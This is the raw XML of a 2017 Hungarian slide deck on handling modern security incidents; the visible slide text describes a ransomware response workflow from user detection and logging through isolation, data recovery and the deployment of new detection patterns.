            <a:ext cx="10869613" cy="357188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="26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73975317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B91E47-A48D-4A0C-B4E4-A2632D6AEC63}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/25/17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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– strictly confidential, confidential, internal, public –</a:t>
            </a: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866EC0-967F-4EDD-BA6D-276A0952EEB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36181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14325"/>
            <a:ext cx="10863263" cy="5032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674813"/>
            <a:ext cx="10869613" cy="38877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DDA194-CBD0-45D0-90E0-1ABAAD33265A}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/25/17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– strictly confidential, confidential, internal, public –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2F7AA1-2E9A-428C-A8CD-20E9EC54A0C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1668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14325"/>
            <a:ext cx="10863263" cy="5032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E4462D-C50B-44DF-9B0C-1B93D8E535FC}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/25/17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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– strictly confidential, confidential, internal, public –</a:t>
            </a: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1BB149-E0DC-40D3-A823-D1FCE92AEFE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68383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14325"/>
            <a:ext cx="10863263" cy="5032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674813"/>
            <a:ext cx="5357813" cy="38877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15013" y="1674813"/>
            <a:ext cx="5359400" cy="38877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011217-C0CC-40F6-8C4A-782D20DC6BEC}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/25/17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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– strictly confidential, confidential, internal, public –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7CD203-ACB8-4F0F-83C4-8CF9BA86E95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8700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ags" Target="../tags/tag6.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId15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theme" Target="../theme/theme1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4.xml"/><Relationship Id="rId10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53" hidden="1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7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3175" cy="3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Titelplatzhalter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 bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="314325"/>
            <a:ext cx="10863263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hu-HU" smtClean="0"/>
              <a:t>MASTERTITELFORMAT BEARBEITEN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2052" name="Textplatzhalter 2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 bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="1674813"/>
            <a:ext cx="10869613" cy="3887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hu-HU" smtClean="0"/>
              <a:t>Mastertextformat bearbeiten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" smtClean="0"/>
              <a:t>Zweite Ebene</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" smtClean="0"/>
              <a:t>Dritte Ebene</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" smtClean="0"/>
              <a:t>Vierte Ebene</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" smtClean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10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8647113" y="5957888"/>
            <a:ext cx="2268537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defRPr sz="1100" smtClean="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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B0C4DD11-6AC5-4B87-8E85-B928CF4CE131}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/25/17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11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3254375" y="5957888"/>
            <a:ext cx="5168900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100" smtClean="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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>– strictly confidential, confidential, internal, public –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 bwMode="gray">
          <a:xfrm>
            <a:off x="10834688" y="5957888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1100" smtClean="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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B8F52EE6-FDF1-4C27-B3EE-BF4A1D108B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2056" name="Picture 65" descr="TSY_Logo_3c_p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200" y="5907088"/>
            <a:ext cx="2533650" cy="458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2" r:id="rId2"/>
    <p:sldLayoutId id="2147483763" r:id="rId3"/>
    <p:sldLayoutId id="2147483764" r:id="rId4"/>
    <p:sldLayoutId id="2147483765" r:id="rId5"/>
  </p:sldLayoutIdLst>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:hf hdr="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="576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de-DE" sz="3600" kern="1200" dirty="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/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" defTabSz="576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 pitchFamily="2" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" defTabSz="576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 pitchFamily="2" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" defTabSz="576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 pitchFamily="2" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" defTabSz="576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-GroteskUlt" pitchFamily="2" charset="0"/>
          <a:ea typeface="TeleGrotesk Headline Ultra" pitchFamily="2" charset="0"/>
          <a:cs typeface="TeleGrotesk Headline Ultra" pitchFamily="2" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" defTabSz="576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-GroteskUlt" pitchFamily="2" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" defTabSz="576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-GroteskUlt" pitchFamily="2" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" defTabSz="576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-GroteskUlt" pitchFamily="2" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" defTabSz="576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63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sz="20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63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25425" indent="-220663" algn="l" defTabSz="576263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44500" indent="-215900" algn="l" defTabSz="576263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77863" indent="-231775" algn="l" defTabSz="576263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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag24.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag43.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4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1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag45.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4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2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout1.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors1.xml"/><Relationship Id="rId11" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag47.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4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3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag49.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5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4.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag51.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5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notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag53.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5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2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.JPG"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.JPG"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2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3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.tiff"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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4.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag31.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3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5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.tiff"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag33.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3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6.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.jpeg"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag35.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3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7.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag37.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3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8.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag39.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4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9.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag41.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4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6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42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0" name="Rectangle 41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304800" y="4773586"/>
            <a:ext cx="10869613" cy="253916"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hu-HU" altLang="hu-HU" sz="1800" dirty="0" smtClean="0"/>
              <a:t>2017.04.25.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="hu-HU" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Téglalap 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209669" y="4362704"/>
            <a:ext cx="2149218" cy="410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Keleti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Arthur</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 37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304800" y="1669255"/>
            <a:ext cx="10986052" cy="269344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en-US" sz="6000" dirty="0" smtClean="0">
                <a:latin typeface="Tele-GroteskEEUlt" pitchFamily="2" charset="0"/>
                <a:cs typeface="TeleGrotesk Headline Ultra" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>MI KELL EGY MODERN INCIDENS SIKERES KEZELÉSÉHEZ?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6000" dirty="0" smtClean="0">
                <a:latin typeface="Tele-GroteskEEUlt" pitchFamily="2" charset="0"/>
                <a:cs typeface="TeleGrotesk Headline Ultra" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="TeleGrotesk Headline Ultra" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="TeleGrotesk Headline Ultra" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>"TIK-TAK" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="TeleGrotesk Headline Ultra" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>elv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="TeleGrotesk Headline Ultra" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" dirty="0">
              <a:latin typeface="Tele-GroteskEEUlt" pitchFamily="2" charset="0"/>
              <a:cs typeface="TeleGrotesk Headline Ultra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5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5" name="Object 29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6" name="Picture 20" hidden="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8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="697980" y="1999029"/>
            <a:ext cx="9894070" cy="15058"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill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el 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359999" y="294041"/>
            <a:ext cx="7699090" cy="588082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1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600" kern="1200" dirty="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/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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hu-HU" dirty="0" smtClean="0"/>
              <a:t>NAGYJÁBÓL EZ ZAJLIK MA...</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90924" y="2218427"/>
            <a:ext cx="970744" cy="8863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001" marR="3600" indent="80558" algn="ctr"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>Pl. egy zsarolóvírust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>azonosít </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>a felhasználó</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Intel Clear"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303974" y="2245966"/>
            <a:ext cx="1696318" cy="6647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552" marR="3600" algn="ctr"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" spc="-8" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>Az incidens naplózásra kerül a biztonsági rendszerben</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Intel Clear"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3229728" y="2245966"/>
            <a:ext cx="1717076" cy="8863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001" algn="ctr"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>A biztonsági csapat analizálja és megkezdi az elhárítási folyamatot a helyi IT csapattal</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Intel Clear"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5405972" y="2245029"/>
            <a:ext cx="1118600" cy="8863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001" marR="3600" indent="-450" algn="ctr"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" spc="-4" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>A helyi IT izolálja a megfertőzött rendszereket</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Intel Clear"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9988376" y="2191628"/>
            <a:ext cx="1447800" cy="8863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001" marR="3600" indent="9451" algn="ctr"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>Új észlelési minták elkészülnek és a rendszerben terítésre kerülnek</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Intel Clear"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7257112" y="1458822"/>
            <a:ext cx="765138" cy="193595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wrap="square" lIns="0" tIns="47705" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="75609">
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>1.5 days</a:t>
            </a:r>
            <a:endParaRPr sz="1050" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Intel Clear"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6997683" y="2229509"/>
            <a:ext cx="1211982" cy="8863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001" marR="3600" indent="9451" algn="ctr"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>Az IT visszaálltja a klienseket és helyreállítja az adatokat</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Intel Clear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8512951" y="2223072"/>
            <a:ext cx="1163910" cy="8863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9001" marR="3600" indent="9451" algn="ctr"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>A biztonsági csapat analizálja a kórokozót</a:t>
            </a:r>
